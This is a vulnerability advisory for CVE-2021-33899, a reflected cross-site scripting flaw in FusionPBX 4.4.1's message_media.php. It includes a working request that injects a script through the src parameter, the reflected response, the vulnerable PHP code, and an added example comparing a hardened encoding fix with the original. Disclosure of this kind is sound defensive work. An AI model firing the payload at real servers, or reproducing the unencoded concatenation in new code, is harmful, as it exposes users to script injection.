Last active: June 8, 2021 06:10
CVE-2021-33899
------------------------------------------
Cross-Site Scripting in message_media.php
------------------------------------------
[Description]
A penetration test has shown that the application is vulnerable to Cross-Site Scripting (XSS): it is possible to inject and store malicious JavaScript code within it.
------------------------------------------
[Additional Information]
Example request that triggers the XSS payload:
GET /app/messages/message_media.php?id=3e610080-ddb9-4e89-928a-ed681bb2ca58&action=display&src=testtest../%3E%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: */*
Referer: https://localhost:8443/test
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 May 2021 14:39:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: PHPSESSID=b613mqroo0pn7c9eaei5utpabc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 582

<table cellpadding='0' cellspacing='0' border='0' width='100%' height='100%'>
<tr>
<td align='center' valign='middle'>
<img src="data:application/octet-stream;base64," style='width: auto; max-width: 95%; height: auto; max-height: 800px; box-shadow: 0px 1px 20px #888; cursor: pointer;' onclick="$('#message_media_layer').fadeOut(200);" oncontextmenu="window.open('message_media.php?id=3e610080-ddb9-4e89-928a-ed681bb2ca58&src=testtest../>"><script>alert(1)</script>&action=download'); return false;" title="Click to Close, Right-Click to Save">
</td>
</tr>
</table>
Below we present the vulnerable code:
https://github.com/fusionpbx/fusionpbx/blob/master/app/messages/message_media.php#L90

app/messages/message_media.php:
<?php
(...)
//includes
require_once "root.php";
require_once "resources/require.php";

//add multi-lingual support
$language = new text;
$text = $language->get();

//get media uuid
$message_media_uuid = $_GET['id'];
$message_media_source = $_GET['src']; // attacker-controlled, never validated or encoded
$action = $_GET['action'];

//get media
if (is_uuid($message_media_uuid)) {
    $sql = "select message_media_type, message_media_url, message_media_content ";
    $sql .= "from v_message_media ";
    $sql .= "where message_media_uuid = :message_media_uuid ";
    if (is_uuid($_SESSION['user_uuid'])) {
        $sql .= "and user_uuid = :user_uuid ";
        $parameters['user_uuid'] = $_SESSION['user_uuid'];
    }
    $sql .= "and (domain_uuid = :domain_uuid or domain_uuid is null) ";
    $parameters['message_media_uuid'] = $message_media_uuid;
    $parameters['domain_uuid'] = $domain_uuid;
    $database = new database;
    $media = $database->select($sql, $parameters, 'row');
    unset($sql, $parameters);

    switch (strtolower($media['message_media_type'])) {
        case 'jpg':
        case 'jpeg': $content_type = 'image/jpg'; break;
        case 'png': $content_type = 'image/png'; break;
        case 'gif': $content_type = 'image/gif'; break;
        case 'aac': $content_type = 'audio/aac'; break;
        case 'wav': $content_type = 'audio/wav'; break;
        case 'mp3': $content_type = 'audio/mpeg'; break;
        case 'mp2': $content_type = 'video/mpeg'; break;
        case 'm4v': $content_type = 'video/mp4'; break;
        case 'pdf': $content_type = 'application/pdf'; break;
        case 'doc': $content_type = 'application/vnd.ms-word'; break;
        case 'docx': $content_type = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'; break;
        case 'xls': $content_type = 'application/vnd.ms-excel'; break;
        case 'xlsx': $content_type = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'; break;
        case 'ppt': $content_type = 'application/vnd.ms-powerpoint'; break;
        case 'pptx': $content_type = 'application/vnd.openxmlformats-officedocument.presentationml.presentation'; break;
        case 'zip': $content_tyep = 'application/zip'; break; // upstream typo ($content_tyep), shown as in the original
        default: $content_type = 'application/octet-stream'; break;
    }

    switch ($action) {
        case 'download':
            header("Content-type: ".$content_type."; charset=utf-8");
            $filename = $message_media_source != '' ? $message_media_source."_".$message_media_uuid.".".strtolower($media['message_media_type']) : $media['message_media_url'];
            header("Content-Disposition: attachment; filename=\"".$filename."\"");
            header("Content-Length: ".strlen(base64_decode($media['message_media_content'])));
            echo base64_decode($media['message_media_content']);
            break;
        case 'display':
            echo "	<table cellpadding='0' cellspacing='0' border='0' width='100%' height='100%'>\n";
            echo "		<tr>\n";
            echo "			<td align='center' valign='middle'>\n";
            // XSS sink: $message_media_source is concatenated into the oncontextmenu attribute unencoded
            echo "				<img src=\"data:".$content_type.";base64,".$media['message_media_content']."\" style='width: auto; max-width: 95%; height: auto; max-height: 800px; box-shadow: 0px 1px 20px #888; cursor: pointer;' onclick=\"$('#message_media_layer').fadeOut(200);\" oncontextmenu=\"window.open('message_media.php?id=".$message_media_uuid."&src=".$message_media_source."&action=download'); return false;\" title=\"Click to Close, Right-Click to Save\">\n";
            echo "			</td>\n";
            echo "		</tr>\n";
            echo "	</table>\n";
            break;
    }
}
?>
The unsanitized value of $message_media_source, taken directly from the src GET parameter, is echoed into the oncontextmenu attribute of the <img> tag in the display branch, so any quote or angle bracket in it breaks out of the attribute.
------------------------------------------
[VulnerabilityType Other]
Cross Site Scripting
------------------------------------------
[Vendor of Product]
https://www.fusionpbx.com/
------------------------------------------
[Affected Product Code Base]
FusionPBX - 4.4.1
------------------------------------------
[Affected Component]
app/messages/message_media.php
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Reference]
https://github.com/OWASP/ASVS/blob/master/4.0/en/0x13-V5-Validation-Sanitization-Encoding.md
https://www.owasp.org/images/b/bc/OWASP_Top_10_Proactive_Controls_V3.pdf
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)
------------------------------------------
[Discoverer]
Maciej Domański (AFINE.com team)
------------------------------------------
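To show where the output encoding is missing, the following added example (written for this note, not FusionPBX code or an upstream patch) reduces the display branch to one function and places a hardened version beside it. The function names, the UUID check and the use of http_build_query()/htmlspecialchars() are this example's choices; the payload string is the one from the request above, the other values are constructed.

```php
<?php
// Added example, not FusionPBX code. Names such as render_media_display_vulnerable()
// are hypothetical; $src carries the attacker-controlled GET parameter "src".

// Vulnerable form: $src is concatenated into a URL that sits inside a JS string
// that sits inside a double-quoted HTML attribute, with no encoding for any of
// the three contexts. A `"` in $src terminates the attribute, a `<` opens a tag.
function render_media_display_vulnerable(string $uuid, string $src, string $content_type, string $content_b64): string {
    return "<img src=\"data:".$content_type.";base64,".$content_b64."\""
         ." oncontextmenu=\"window.open('message_media.php?id=".$uuid."&src=".$src."&action=download'); return false;\">";
}

// Hardened form: (1) only a syntactically valid UUID is rendered at all,
// (2) the query string is built with RFC 3986 percent-encoding, so no quote,
// angle bracket, slash or ampersand from $src survives into the URL, and
// (3) every attribute value is HTML-encoded for the attribute context.
function render_media_display_fixed(string $uuid, string $src, string $content_type, string $content_b64): string {
    if (!preg_match('/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i', $uuid)) {
        return ''; // malformed id: render nothing rather than reflect it
    }
    $query = http_build_query(
        ['id' => $uuid, 'src' => $src, 'action' => 'download'],
        '', '&', PHP_QUERY_RFC3986 // PHP_QUERY_RFC3986 selects rawurlencode() semantics
    );
    $handler = "window.open('message_media.php?".$query."'); return false;";
    $attr = fn(string $v): string => htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<img src=\"data:".$attr($content_type).";base64,".$attr($content_b64)."\""
         ." oncontextmenu=\"".$attr($handler)."\">";
}

// Inputs: the id and the decoded src payload from the advisory's request; the
// content type and base64 body are constructed stand-ins for the database row.
$uuid = '3e610080-ddb9-4e89-928a-ed681bb2ca58';
$src  = 'testtest../>"><script>alert(1)</script>';
$type = 'image/png';
$b64  = 'iVBORw0KGgo='; // constructed, not a real image

// The first line reproduces the broken-out attribute seen in the response above;
// in the second, the payload is reduced to percent-encoded text inside the URL
// and the oncontextmenu attribute stays intact.
echo render_media_display_vulnerable($uuid, $src, $type, $b64), "\n\n";
echo render_media_display_fixed($uuid, $src, $type, $b64), "\n";
```

The same encoding step also applies to the download branch, where $message_media_source is reused unencoded in a header value; that path is outside the XSS scope of this advisory.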